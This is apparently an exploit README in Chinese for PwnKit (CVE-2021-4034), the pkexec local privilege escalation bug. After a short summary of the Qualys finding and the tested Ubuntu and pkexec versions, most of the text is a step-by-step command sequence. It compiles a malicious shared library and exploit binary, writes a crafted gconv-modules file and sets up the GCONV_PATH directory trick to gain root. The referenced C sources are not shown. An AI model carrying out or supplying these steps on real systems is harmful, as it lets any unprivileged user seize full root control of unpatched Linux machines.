Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,pkexec 是一个 SUID-root 程序,默认安装在所有主流 Linux 发行版中。这个易于利用的漏洞允许任何非特权用户通过利用其默认配置中的该漏洞,在易受攻击的主机上获得完整的 root 权限。
PwnKit:在 polkit 的 pkexec 中发现的本地权限提升漏洞(CVE-2021-4034)
Ubuntu 20.04.3 LTS x86_64
pkexec 版本 0.105
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit